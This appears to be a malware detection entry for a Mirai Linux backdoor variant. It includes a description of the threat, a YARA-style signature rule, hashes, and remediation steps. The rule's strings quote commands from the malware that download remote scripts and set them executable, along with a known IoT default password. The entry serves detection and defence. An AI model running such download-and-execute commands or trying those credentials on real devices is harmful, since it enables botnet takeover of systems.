Concrete signature match: Backdoor - Provides unauthorized remote access for Linux platform, family Mirai
This threat is a concrete detection of Backdoor:Linux/Mirai.B!AMTB, a variant of the Mirai botnet designed to infect Linux-based systems, often targeting IoT devices. It establishes a backdoor, maintains persistence through lock files, and is programmed to download and execute additional malicious scripts from command-and-control (C2) servers. The botnet is known for credential brute-forcing and launching Distributed Denial of Service (DDoS) attacks.
Relevant strings associated with this threat: - |#d1e49aac-8f56-4280-b9ba-993a6d77406c (NID) - }#d1e49aac-8f56-4280-b9ba-993a6d77406c (NID) - |#75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84 (NID) - }#75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84 (NID) - &|#b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 (NID) - &}#b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 (NID) - y*|#56a863a9-875e-4185-98a7-b882c64b5ce5 (NID) - y*}#56a863a9-875e-4185-98a7-b882c64b5ce5 (NID) - C|#be9ba2d9-53ea-4cdc-84e5-9b1eeee46550 (NID) - C}#be9ba2d9-53ea-4cdc-84e5-9b1eeee46550 (NID) - L|#3b576869-a4ec-4529-8536-b80a7769e899 (NID) - L}#3b576869-a4ec-4529-8536-b80a7769e899 (NID) - |#5beb7efe-fd9a-4556-801d-275e5ffc04cc (NID) - }#5beb7efe-fd9a-4556-801d-275e5ffc04cc (NID) - |#01443614-cd74-433a-b99e-2ecdc07bfc25 (NID) - }#01443614-cd74-433a-b99e-2ecdc07bfc25 (NID) - |#d3e037e1-3eb8-44c8-a917-57927947596d (NID) - }#d3e037e1-3eb8-44c8-a917-57927947596d (NID) - |#7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c (NID) - }#7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c (NID)
rule Backdoor_Linux_Mirai_B_2147956509_0
{
meta:
author = "threatcheck.sh"
detection_name = "Backdoor:Linux/Mirai.B!AMTB"
threat_id = "2147956509"
type = "Backdoor"
platform = "Linux: Linux platform"
family = "Mirai"
severity = "Critical"
info = "AMTB: an internal category used to refer to some threats"
signature_type = "SIGNATURE_TYPE_ELFHSTR_EXT"
threshold = "5"
strings_accuracy = "High"
strings:
$x_1_1 = "xmhdipc" ascii //weight: 1
$x_1_2 = "/tmp/.bot_lock" ascii //weight: 1
$x_1_3 = "cd /root wget http://%s/cat.sh" ascii //weight: 1
$x_1_4 = "wget http://%s/run.sh; curl -O http://%s/run.sh; chmod 777 run.sh" ascii //weight: 1
$x_1_5 = "7ujMko0admin" ascii //weight: 1
$x_1_6 = "udpplain" ascii //weight: 1
condition:
(filesize < 20MB) and
(5 of ($x*))
}2fe00e41c412e3f662d2fe843c0be9b953a6c1b70c30c39c6ca75d765889a7b5c3dd8b63e749f4611cb23cd1c52ad6fa18a989d74d7a738b4acabcad547e74c55f337f54cdc1231606c807b50d03ca455c4c7214098b79a1437da21fab19d41bbf00aaa691623f783a1136b4a2c6aa34d99d10027a792fc43aa2f597a9875ef930bb1077440b30fb0fe122c673c4d685028444d6ca2903ee652387af2b143f1aImmediately isolate the compromised Linux system from the network. Conduct a thorough scan with an updated EDR/antivirus solution to fully remove the Mirai binary and any associated persistence mechanisms. Change all compromised or default credentials, apply all available security patches to the operating system and applications, and implement network segmentation with egress filtering to prevent C2 communication.